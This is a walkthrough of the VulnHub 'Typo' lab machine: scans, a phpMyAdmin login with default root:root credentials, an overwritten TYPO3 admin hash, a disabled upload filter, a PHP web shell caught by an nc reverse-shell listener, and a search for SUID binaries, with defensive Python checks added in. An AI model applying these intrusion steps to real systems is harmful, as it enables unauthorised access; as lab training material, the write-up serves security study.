Vulnhub Typo Machine: Detailed Walkthrough

Typo

Identifying the target host's IP address

┌──(kali㉿kali)-[~/Vulnhub/Typo]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts                                                        
                                                                                                                            
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:06      1      60  Unknown vendor                                                           
 192.168.56.100  08:00:27:33:05:72      1      60  PCS Systemtechnik GmbH                                                   
 192.168.56.145  08:00:27:5c:be:2d      1      60  PCS Systemtechnik GmbH    

Using Kali Linux's netdiscover tool, the target host's IP address is identified as 192.168.56.145.

NMAP scan

┌──(kali㉿kali)-[~/Vulnhub/Typo]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.145 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-04 20:30 EST
Nmap scan report for localhost (192.168.56.145)
Host is up (0.000069s latency).
Not shown: 65530 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 cddc8f24517354bc8762a2e6edf1c1b4 (RSA)
|   256 a939a9bfb2f701226507be1548e8ef11 (ECDSA)
|_  256 77f5a9ffa6447c9c3441f1ec735e57bd (ED25519)
80/tcp   open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Page Not Found
|_http-server-header: Apache/2.4.38 (Debian)
8000/tcp open  http    Apache httpd 2.4.38
|_http-title: Did not follow redirect to http://typo.local
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.38 (Debian)
8080/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.38 (Debian)
8081/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:5C:BE:2D (Oracle VirtualBox virtual NIC)
Service Info: Host: 127.0.0.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.78 seconds

The NMAP results show the following open ports on the target: 22 (ssh), 80 (http), 8000 (http), 8080 (http) and 8081 (http).

Getting a shell

Port 80

Browsing port 80 from Kali Linux, the returned page shows that the target runs the Typo3 CMS on this port, but the version is unknown.

┌──(kali㉿kali)-[~/Vulnhub/Typo]
└─$ nikto -h http://192.168.56.145      
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.145
+ Target Hostname:    192.168.56.145
+ Target Port:        80
+ Start Time:         2023-03-04 20:56:34 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7914 requests: 0 error(s) and 4 item(s) reported on remote host
+ End Time:           2023-03-04 20:58:03 (GMT-5) (89 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


      *********************************************************************
      Portions of the server's headers (Apache/2.4.38) are not in
      the Nikto 2.1.6 database or are newer than the known string. Would you like
      to submit this information (*no server specific data*) to CIRT.net
      for a Nikto update (or you may email to sullo@cirt.net) (y/n)? 

Port 8000

Visiting port 8000 from Kali Linux, the browser is redirected to typo.local.

Add that name to the /etc/hosts file.

┌──(kali㉿kali)-[~/Vulnhub/Typo]
└─$ sudo vim /etc/hosts
[sudo] password for kali: 
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Typo]
└─$ cat /etc/hosts   
127.0.0.1       localhost
127.0.1.1       kali
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters
192.168.56.145  typo.local

Refresh the page.

┌──(kali㉿kali)-[~/Vulnhub/Typo]
└─$ nikto -h http://192.168.56.145:8000 
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.145
+ Target Hostname:    192.168.56.145
+ Target Port:        8000
+ Start Time:         2023-03-04 21:44:39 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Root page / redirects to: http://typo.local
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /modules.php?letter=%22%3E%3Cimg%20src=javascript:alert(document.cookie);%3E&op=modload&name=Members_List&file=index: Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ 7917 requests: 0 error(s) and 4 item(s) reported on remote host
+ End Time:           2023-03-04 21:45:25 (GMT-5) (46 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


      *********************************************************************
      Portions of the server's headers (Apache/2.4.38) are not in
      the Nikto 2.1.6 database or are newer than the known string. Would you like
      to submit this information (*no server specific data*) to CIRT.net
      for a Nikto update (or you may email to sullo@cirt.net) (y/n)? 


Port 8080

┌──(kali㉿kali)-[~/Vulnhub/Typo]
└─$ nikto -h http://192.168.56.145:8080
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.145
+ Target Hostname:    192.168.56.145
+ Target Port:        8080
+ Start Time:         2023-03-04 22:02:22 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD 
+ /phpinfo.php: Output from the phpinfo() function was found.
+ OSVDB-3233: /phpinfo.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7917 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2023-03-04 22:03:09 (GMT-5) (47 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


      *********************************************************************
      Portions of the server's headers (Apache/2.4.38) are not in
      the Nikto 2.1.6 database or are newer than the known string. Would you like
      to submit this information (*no server specific data*) to CIRT.net
      for a Nikto update (or you may email to sullo@cirt.net) (y/n)? 

┌──(kali㉿kali)-[~/Vulnhub/Typo]
└─$ gobuster dir -u http://192.168.56.145 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.sh,.txt -b 403 --exclude-length 2363
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.145
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   403
[+] Exclude Length:          2363
[+] User Agent:              gobuster/3.3
[+] Extensions:              php,html,sh,txt
[+] Timeout:                 10s
===============================================================
2023/03/04 20:59:33 Starting gobuster in directory enumeration mode
===============================================================
/fileadmin            (Status: 301) [Size: 320] [--> http://192.168.56.145/fileadmin/]
/typo3temp            (Status: 301) [Size: 320] [--> http://192.168.56.145/typo3temp/]
/typo3                (Status: 301) [Size: 316] [--> http://192.168.56.145/typo3/]
/http%3A%2F%2Fwww.php (Status: 404) [Size: 276]
/http%3A%2F%2Fwww.html (Status: 404) [Size: 276]
/http%3A%2F%2Fwww.txt (Status: 404) [Size: 276]
/http%3A%2F%2Fwww     (Status: 404) [Size: 276]
/http%3A%2F%2Fwww.sh  (Status: 404) [Size: 276]
/typo3conf            (Status: 301) [Size: 320] [--> http://192.168.56.145/typo3conf/]

The /typo3 directory found by gobuster is the user login page.

Port 8081

                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Typo]
└─$ nikto -h http://192.168.56.145:8081 
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.145
+ Target Hostname:    192.168.56.145
+ Target Port:        8081
+ Start Time:         2023-03-04 22:03:27 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD 
+ Uncommon header 'x-ob_mode' found, with contents: 1
+ Cookie goto created without the httponly flag
+ Cookie back created without the httponly flag
+ OSVDB-3092: /phpmyadmin/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ OSVDB-3092: /phpmyadmin/README: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ 7917 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time:           2023-03-04 22:04:16 (GMT-5) (49 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


      *********************************************************************
      Portions of the server's headers (Apache/2.4.38) are not in
      the Nikto 2.1.6 database or are newer than the known string. Would you like
      to submit this information (*no server specific data*) to CIRT.net
      for a Nikto update (or you may email to sullo@cirt.net) (y/n)? 

nikto found /phpmyadmin. Checking it for weak credentials, the weakness is indeed present: root:root logs in.

Now the admin password in the database needs to be replaced with one of our own, but the database stores it as an argon2 hash, so generate the hash of 123456 with the online tool below:

https://www.coderstool.com/argon2-hash-generator

Note that the hash algorithm must be set to Argon2id.

After updating the password field for the user admin, visit:

http://192.168.56.145/typo3/

Login to the admin backend succeeds.

The admin backend has a file upload entry, but attempting to upload shell.php returns: Filename "shell.php" is not allowed!

Prepending a GIF file header does not help.

The rejection comes from the fileDenyPattern setting; clear it.

Then go back to the filelist and upload shell.php; this time it succeeds.
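To make the fileDenyPattern step concrete, here is an added Python example (not TYPO3's own code and not from this writeup) that reimplements the filename check: a regex modelled on TYPO3's documented default deny pattern (the exact regex is reproduced from memory and is an assumption), applied case-insensitively as TYPO3 does. It shows why shell.php and the double-extension shell.php.gif are rejected, why adding a GIF header cannot help (the check looks only at the filename, never at the content), and that an empty pattern accepts everything, which is the effect of clearing the setting.

```python
import re

# Deny pattern modelled on TYPO3's documented default fileDenyPattern.
# Assumption: reproduced from memory; check your own installation's value.
DEFAULT_FILE_DENY_PATTERN = (
    r"\.(php[3-8]?|phpsh|phtml|pht|phar|shtml|cgi)(\..*)?$"
    r"|\.pl$|^\.htaccess$"
)


def is_filename_allowed(filename: str,
                        deny_pattern: str = DEFAULT_FILE_DENY_PATTERN) -> bool:
    """Return True if the filename passes the deny-pattern check.

    Only the name is inspected; file content (e.g. a GIF header prepended
    to PHP code) plays no role. An empty pattern disables the check
    entirely, which is exactly what clearing fileDenyPattern does.
    """
    if deny_pattern == "":
        return True
    return re.search(deny_pattern, filename, flags=re.IGNORECASE) is None


def audit_uploads(filenames, deny_pattern=DEFAULT_FILE_DENY_PATTERN) -> dict:
    """Map each candidate filename to whether it would be accepted."""
    return {name: is_filename_allowed(name, deny_pattern) for name in filenames}


if __name__ == "__main__":
    # Constructed sample filenames illustrating the cases discussed above.
    samples = ["shell.php", "shell.php.gif", "shell.gif", "image.PHP",
               "notes.txt", ".htaccess"]
    for name, ok in audit_uploads(samples).items():
        print(f"{name:16} {'allowed' if ok else 'denied'}")
    print("with empty pattern:", audit_uploads(samples, ""))
```

The double-extension case (shell.php.gif) is handled by the `(\..*)?$` group, so renaming alone does not bypass the default pattern; the only thing that removes the protection is weakening or emptying the pattern itself.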

Visit:

http://192.168.56.145/fileadmin/shell.php

┌──(kali㉿kali)-[~/Vulnhub/Typo]
└─$ sudo nc -nlvp 5555                                         
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.145] 46740
Linux typo 4.19.0-8-amd64 #1 SMP Debian 4.19.98-1 (2020-01-26) x86_64 GNU/Linux
 09:08:50 up  2:15,  0 users,  load average: 0.01, 0.17, 3.29
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ which python
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@typo:/$ ls -alh

Privilege escalation

www-data@typo:/tmp$ find / -perm -4000 -type f 2>/dev/null
find / -perm -4000 -type f 2>/dev/null
/usr/bin/mount
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/su
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/umount
/usr/bin/passwd
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/local/bin/apache2-restart
/usr/local/bin/phpunit
www-data@typo:/tmp$ 

The SUID bit on apache2-restart can be used for privilege escalation.

Running this file also executes the service command.
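The SUID listing above is the kind of inventory a defender should compare against a baseline. As an added Python example (not part of this writeup), the function below parses that find output (embedded here as constructed sample input copied from the listing) and reports setuid binaries that sit outside the directories where a stock Debian install keeps its setuid programs; the allowlist of directories is an assumption to be tuned to one's own baseline. On this input it flags /usr/local/bin/apache2-restart and /usr/local/bin/phpunit, the two custom additions, the first of which is the one the writeup singles out.

```python
from pathlib import PurePosixPath

# Constructed sample input: the `find / -perm -4000 -type f` output above.
FIND_OUTPUT = """\
/usr/bin/mount
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/su
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/umount
/usr/bin/passwd
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/local/bin/apache2-restart
/usr/local/bin/phpunit
"""

# Assumption: directories where a stock Debian install keeps its setuid
# binaries. Replace with a baseline captured from a known-clean system.
EXPECTED_SUID_DIRS = frozenset({
    "/bin", "/sbin", "/usr/bin", "/usr/sbin",
    "/usr/lib/dbus-1.0", "/usr/lib/eject", "/usr/lib/openssh",
})


def parse_suid_listing(text: str) -> list:
    """Extract absolute paths from find output, skipping prompts and echoes."""
    return [ln.strip() for ln in text.splitlines() if ln.strip().startswith("/")]


def unexpected_suid(paths, expected_dirs=EXPECTED_SUID_DIRS) -> list:
    """Return setuid files whose parent directory is not on the allowlist."""
    return [p for p in paths if str(PurePosixPath(p).parent) not in expected_dirs]


def audit(text: str = FIND_OUTPUT) -> dict:
    """Summarise the listing: total setuid files and those needing review."""
    paths = parse_suid_listing(text)
    return {"total": len(paths), "flagged": unexpected_suid(paths)}


if __name__ == "__main__":
    result = audit()
    print(f"{result['total']} setuid files, {len(result['flagged'])} outside baseline dirs")
    for path in result["flagged"]:
        print("review:", path)
```

Anything flagged deserves a look at what it runs and with which PATH; a custom setuid helper that invokes other commands is the classic case where a locally added binary undoes the system's default least-privilege posture.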


Posted 2023-03-05 12:08 by Jason_huawen